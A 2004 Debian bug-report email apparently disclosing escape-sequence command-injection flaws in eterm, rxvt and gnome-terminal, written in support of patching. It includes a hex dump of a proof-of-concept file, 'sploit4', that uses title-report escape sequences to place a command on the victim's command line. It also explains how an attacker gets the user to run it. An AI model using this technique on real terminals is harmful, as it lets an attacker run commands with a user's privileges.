Bug#244811: Bug#244808: Processed: Annotating

Jan Minar Jan Minar <jjminar@fastmail.fm>, 244811@bugs.debian.org
Tue, 20 Apr 2004 22:21:39 +0200


--FL5UXtIhxfXey3p5
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Would it be possible to join the three bugs, as even the codebase is
very similar (xterm descendant; BTW xterm is not vulnerable anymore):

#244808: eterm: Arbitrary command execution a.o. via escape sequencies
#244810: rxvt: Arbitrary command execution a.o. via escape sequencies
#244811: gnome-terminal: Arbitrary command execution a.o. via escape sequen=
ces

On Tue, Apr 20, 2004 at 12:59:03PM -0400, Laurence J. Lane wrote:
> On Tue, Apr 20, 2004 at 09:52:18AM -0700, Matt Zimmerman wrote:
>=20
> > > CAN-2003-0068 suggests an Eterm 0.9.1 and earlier problem. I
> > > have confirm it for woody and prepare a patch if necessary.
>         ^ to
>=20
> > I am not sure I understand you clearly.  Which of these:
>=20
> > - You have confirmed that woody is vulnerable
> > - You have confirmed that woody is not vulnerable
> > - You will attempt to determine whether woody is vulnerable

Of course the file writing is not possible:

>>> ESC ] n ; string BEL      n =3D=3D 30: Dump contents of scrollback to f=
ile

(jan@kontryhel)(2811/pts)(09:44pm:04/20/04)-
(%:~/sandbox)- echo -ne '\033]n;foo\a'=20
(jan@kontryhel)(2812/pts)(09:44pm:04/20/04)-
(%:~/sandbox)- ls
(jan@kontryhel)(2813/pts)(09:44pm:04/20/04)-
(%:~/sandbox)-=20


But it's still possible to insert arbitrary characters in the input
stream:

(jan@kontryhel)(2883/pts)(10:09pm:04/20/04)-
(%:~)- xxd sploit4
0000000: 1b5d 323b 3b65 6368 6f20 6865 6c6c 6f20  .]2;;echo hello=20
0000010: 776f 726c 643b 3a20 506c 6561 7365 2070  world;: Please p
0000020: 7265 7373 203c 5265 7475 726e 3e2e 2e2e  ress <Return>...
0000030: 071b 5b32 3174 0a                        ..[21t.
(jan@kontryhel)(2884/pts)(10:09pm:04/20/04)-
(%:~)- cat sploit4

(jan@kontryhel)(2885/pts)(10:09pm:04/20/04)-
(%:~)- l;echo hello world;: Please press <Return>...
       ^^^^^^This is as-if typed by the user.^^^^^^^

If the user really presses <Ret>, zsh will execute the command `l', or
changes the directory to ~jan/l (heh, my case).  Then the helloworld
payload is executed.  The only thing the attacker has to do, is to
persuade the user to _approve_ the execution of the payload.  As the
attacker controls the whole display, this will be fairly easy.

The main problem is the user cannot tell whether she is being deceived
by a rogue file.  Normally, this would not be a problem, as a just one
more <Return> on an empty command line is not an issue.  But now, the
commandline is not empty, it contains the payload, which will get
executed with the privileges of the user.

There are other less nasty escape sequences, as I wrote in the original
bugreport.

Jan.

--=20
   "To me, clowns aren't funny. In fact, they're kind of scary. I've wonder=
ed
 where this started and I think it goes back to the time I went to the circ=
us,
			  and a clown killed my dad."

--FL5UXtIhxfXey3p5
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAhYZT+uczK20Fa5cRAuphAJ9nPp/Brge/3VUzCNshGixQl0ljPQCePwsq
ud8hU8ChXU47ed6BfSkSpJ0=
=ALv1
-----END PGP SIGNATURE-----

--FL5UXtIhxfXey3p5--